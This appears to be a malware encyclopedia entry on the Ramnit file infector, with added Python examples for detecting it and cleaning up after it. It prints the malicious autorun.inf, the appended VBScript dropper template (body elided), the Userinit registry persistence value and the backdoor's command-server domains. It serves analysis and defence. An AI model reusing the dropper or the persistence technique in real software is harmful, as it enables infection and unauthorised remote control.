Virus.Win32.Ramnit.a

by Atlantis on April 12th, 2012 in Malware Descriptions.

Detect: Virus.Win32.Ramnit.a

Platform: Win32

Type: Virus

Size: 103936 bytes

Language: C++

md5: CDF0778E1B80069D137A3E7A0C7C787F

sha1: E1826123B190C1FB3D11BBEA33EF6D1CCEABAD43

Summary

It is a malicious program which infects files on the user's PC.

Technical Details

Spreading over Removable Storage Devices

On all removable storage devices connected to the infected computer, the virus creates the following files:

<infected volume name>:\Recycler\S-<ID>\<rnd_1>.cpl (3584 bytes)

<infected volume name>:\Recycler\S-<ID>\<rnd_2>.exe (56832 bytes)

<infected volume name>:\Copy of Shortcut to (1).lnk (691 bytes)

<infected volume name>:\Copy of Shortcut to (2).lnk (722 bytes)

<infected volume name>:\Copy of Shortcut to (3).lnk (858 bytes)

<infected volume name>:\Copy of Shortcut to (4).lnk (867 bytes)

<infected volume name>:\autorun.inf (11964 bytes)

where

  • <ID> is a numeric identifier (e.g. "1-4-83-4678327503-5842818778-105234524-7024"),
  • <rnd_1>, <rnd_2> are random sequences of Latin letters (e.g. "xVgGwSIp", "lwTCZgQP").

The "autorun.inf" file contains a malicious script:

    [autorun]
    action=Open
    icon=%WinDir%\system32\shell32.dll,4
    shellexecute=\RECYCLER\S-<ID>\<rnd_2>.exe
    shell\explore\command=\RECYCLER\S-<ID>\<rnd_2>.exe
    USEAUTOPLAY=1
    shell\Open\command=\RECYCLER\S-<ID>\<rnd_2>.exe

The script is executed each time the user opens the infected disk in Windows Explorer, provided the autoplay function is turned on; when executed, it launches the "<rnd_2>.exe" file. The shortcuts created by the malicious program are exploits for the CVE-2010-2568 vulnerability in the "shell32.dll" library. The vulnerability is an error in the processing of shortcuts (.lnk and .pif files) that allows code from an arbitrary Windows library to be executed when Windows Explorer handles the shortcut's icon. In this case the code of the "<rnd_1>.cpl" library is executed, and it in turn launches the "<rnd_2>.exe" file. The malicious program prevents the files described above from being modified and re-creates them in an endless loop.
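The autorun.inf shown above can be recognised without executing anything on the volume. The following is an added example, not code from the original description: it parses the [autorun] section and reports every key that would launch a file, flagging targets hidden under \RECYCLER as in the sample. The sample file is constructed from the text above, with the example <ID> and <rnd_2> values filled in.

```python
import re
from typing import Dict, List

# Constructed sample mirroring the autorun.inf described above, with the example
# <ID> and <rnd_2> values from the text filled in; it is not a captured file.
SAMPLE_AUTORUN = """[autorun]
action=Open
icon=%WinDir%\\system32\\shell32.dll,4
shellexecute=\\RECYCLER\\S-1-4-83-4678327503-5842818778-105234524-7024\\lwTCZgQP.exe
shell\\explore\\command=\\RECYCLER\\S-1-4-83-4678327503-5842818778-105234524-7024\\lwTCZgQP.exe
USEAUTOPLAY=1
shell\\Open\\command=\\RECYCLER\\S-1-4-83-4678327503-5842818778-105234524-7024\\lwTCZgQP.exe
"""

def parse_autorun(text: str) -> Dict[str, str]:
    """Parse the [autorun] section into lower-cased key -> value (last one wins)."""
    keys: Dict[str, str] = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            keys[key.strip().lower()] = value.strip()
    return keys

def autorun_indicators(text: str) -> List[str]:
    """Return one finding per key that would launch code the way the sample does."""
    keys = parse_autorun(text)
    findings: List[str] = []
    for key, value in keys.items():
        # open= and shellexecute= run directly; shell\<verb>\command= runs from the context menu.
        launches = key in ("open", "shellexecute") or (
            key.startswith("shell\\") and key.endswith("\\command"))
        if not launches:
            continue
        if "\\recycler\\" in value.lower():
            findings.append(f"{key} launches a file hidden under \\RECYCLER: {value}")
        elif re.search(r"\.(exe|cpl|scr|bat|cmd)(\s|$)", value.lower()):
            findings.append(f"{key} launches an executable from the volume: {value}")
    if keys.get("useautoplay") == "1":
        findings.append("USEAUTOPLAY=1 is set, as in the sample above")
    return findings
```

Running `autorun_indicators(SAMPLE_AUTORUN)` yields four findings: one for each of the three launch keys and one for USEAUTOPLAY.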

File Infection

The virus infects files with the following extensions:

exe

html

dll

htm

Executable files and Windows dynamic link libraries are infected by appending the virus body to the end of the last PE section of the target file, and the entry point of the program is changed so that control passes to the virus code first. When infecting HTML and HTM files, the following script is appended to the end of the target document:

    <SCRIPT Language=VBScript><!--
    DropFileName = "svchost.exe"
    WriteData = "4D5A... (binary virus body)"
    Set FSO = CreateObject("Scripting.FileSystemObject")
    DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
    If FSO.FileExists(DropPath)=False Then
        Set FileObj = FSO.CreateTextFile(DropPath, True)
        For i = 1 To Len(WriteData) Step 2
            FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
        Next
        FileObj.Close
    End If
    Set WSHshell = CreateObject("WScript.Shell")
    WSHshell.Run DropPath, 0
    //--></SCRIPT>

Thus, each time an infected document is opened, the virus body is saved to the current user's temporary folder as

%Temp%\svchost.exe

and launched for execution.
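Because the appended block stores the dropper name in DropFileName and the hex-encoded body in WriteData, an infected page can be identified and the payload recovered without running the script. The following is an added example, not code from the original description; the infected page it scans is constructed, with a 4-byte MZ stub standing in for the virus body and the drop-and-run statements replaced by a comment.

```python
import re
from typing import Optional

# The appended block assigns the hex-encoded body to WriteData and the drop name
# to DropFileName, so both can be recovered without executing the script.
INJECT_RE = re.compile(
    r'<SCRIPT\s+Language=VBScript>\s*<!--.*?DropFileName\s*=\s*"([^"]+)"'
    r'.*?WriteData\s*=\s*"([0-9A-Fa-f]*)".*?--></SCRIPT>',
    re.IGNORECASE | re.DOTALL,
)

def find_injected_dropper(html: str) -> Optional[dict]:
    """Return details of an appended dropper block, or None when none is present."""
    m = INJECT_RE.search(html)
    if not m:
        return None
    drop_name, hexdata = m.group(1), m.group(2)
    # The VBScript loop consumes two hex digits per byte; a trailing odd digit is ignored.
    body = bytes.fromhex(hexdata[: len(hexdata) - len(hexdata) % 2])
    return {
        "drop_name": drop_name,
        "payload_len": len(body),
        "is_pe": body[:2] == b"MZ",  # DOS header magic of a Windows executable
        "script_start": m.start(),
        "script_end": m.end(),
    }

def strip_injected_dropper(html: str) -> str:
    """Return the document with the appended block removed."""
    return INJECT_RE.sub("", html)

# Constructed sample: a clean page with a block in the shape shown above appended.
# The encoded "body" is a 4-byte MZ stub plus zero padding, not a real executable,
# and the drop-and-run statements are replaced by a VBScript comment.
CLEAN_HTML = "<html><body><p>Hello</p></body></html>\n"
FAKE_BODY_HEX = "4D5A9000" + "00" * 60
INFECTED_HTML = CLEAN_HTML + (
    "<SCRIPT Language=VBScript><!--\n"
    'DropFileName = "svchost.exe"\n'
    f'WriteData = "{FAKE_BODY_HEX}"\n'
    "' ... drop-and-run statements omitted in this sample ...\n"
    "//--></SCRIPT>"
)

if __name__ == "__main__":
    print(find_injected_dropper(INFECTED_HTML))
    print(strip_injected_dropper(INFECTED_HTML) == CLEAN_HTML)
```

The recovered bytes can be hashed and compared against the md5/sha1 given at the top of this description, and the stripped document is what remains of the original page.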

Payload

Once the infected file is launched, the Trojan decrypts and extracts the following file from its body:

%WorkDir%\<name of the infected file being launched>Srv.exe

The created file is then launched for execution, whereupon a copy of the file is created and launched:

%Program Files%\Microsoft\WaterMark.exe

Then, the "WaterMark.exe" process launches an instance of the "svchost.exe" system process and injects its code into it; the injected code performs the following actions:

  • Creates a unique identifier with the following name to ensure that only one instance of its process runs in the system:

    Global\SYSTEM_DEMETRA_MAIN

  • Modifies a registry key value so that the copy of the malicious program created earlier is run automatically:

    [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]

    "Userinit" = "%System%\userinit.exe,,%Program files%\microsoft\watermark.exe"

    As a result, the copy is launched by the "winlogon.exe" process even when the computer starts in safe mode.

  • Prevents modification of the autorun registry key and of the "WaterMark.exe" file.

  • Creates a configuration file to store the current settings of the malicious software:

    %System%\dmlconf.dat

  • Visits the following resource to check for an Internet connection:

    google.com

  • Implements a backdoor. To obtain a list of commands, it connects to the following servers:

    tybdtyutjfyvetscev.com

    ervwetyrbuyouiylkdhrbt.com

    tybsyiutnrtvtybdrser.com

    Depending on the command(s) received from the intruder, the backdoor can perform the following actions:

    - transfer files to the infected computer and launch them for execution.

    - connect to another server to receive commands.

  • The code injected into the address space of the "svchost.exe" process also performs the functionality described in the Spreading over Removable Storage Devices and File Infection sections.
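The Userinit value above is the persistence point that the removal steps later restore. The following is an added example, not code from the original description: it parses a Winlogon Userinit value the way Winlogon does (comma-separated entries, each run in turn) and reports anything other than the system userinit.exe, which also makes the empty entry between the doubled commas visible. The expansions of %System% and %Program files% are assumptions for a default installation.

```python
from typing import Dict, List

# The two Userinit values given in the description: the clean default and the
# value written by the malware (note the empty entry between the doubled commas).
CLEAN_USERINIT = r"%System%\userinit.exe"
INFECTED_USERINIT = r"%System%\userinit.exe,,%Program files%\microsoft\watermark.exe"

# Assumed expansions for the placeholders the description uses; adjust for a
# system installed elsewhere than C:\Windows.
PLACEHOLDERS: Dict[str, str] = {
    "%system%": r"c:\windows\system32",
    "%program files%": r"c:\program files",
}
LEGIT_USERINIT = {r"c:\windows\system32\userinit.exe", "userinit.exe"}

def expand(path: str) -> str:
    """Lower-case a path and substitute the known placeholders."""
    low = path.lower()
    for placeholder, real in PLACEHOLDERS.items():
        low = low.replace(placeholder, real)
    return low

def unexpected_userinit_entries(value: str) -> List[str]:
    """Return every program in a Winlogon Userinit value that is not the system userinit.exe.

    Winlogon runs each comma-separated entry in turn, so the empty entry produced
    by the doubled comma is skipped and the real userinit.exe is accepted wherever
    it appears; anything else is reported for review.
    """
    extras: List[str] = []
    for raw in value.split(","):
        entry = raw.strip().strip('"')
        if not entry or expand(entry) in LEGIT_USERINIT:
            continue
        extras.append(entry)
    return extras

if __name__ == "__main__":
    print(unexpected_userinit_entries(INFECTED_USERINIT))  # the WaterMark.exe entry
    print(unexpected_userinit_entries(CLEAN_USERINIT))     # []
```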

Removal Recommendations

To remove the malicious program, proceed through the steps listed below:

  1. Run a full scan of your computer using an antivirus program with an up-to-date definition database.

  2. Do not launch EXE, HTM or HTML files and do not reboot the computer until the full scan is complete.

  3. Restore the infected files from backup copies.

  4. Restore the registry key value (How to Work with System Registry):

    [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]

    "Userinit" = "userinit.exe"

  5. Delete the following files:

    <infected volume name>:\Recycler\S-<ID>\<rnd_1>.cpl (3584 bytes)

    <infected volume name>:\Recycler\S-<ID>\<rnd_2>.exe (56832 bytes)

    <infected volume name>:\Copy of Shortcut to (1).lnk (691 bytes)

    <infected volume name>:\Copy of Shortcut to (2).lnk (722 bytes)

    <infected volume name>:\Copy of Shortcut to (3).lnk (858 bytes)

    <infected volume name>:\Copy of Shortcut to (4).lnk (867 bytes)

    <infected volume name>:\autorun.inf (11964 bytes)

    %Temp%\svchost.exe

    %WorkDir%\<name of the infected file being launched>Srv.exe

    %Program Files%\Microsoft\WaterMark.exe

  6. Delete the original Trojan file (its name and location depend on the way the Trojan originally penetrated the user's computer).

  7. Clean the Temporary Internet Files folder, which contains infected files.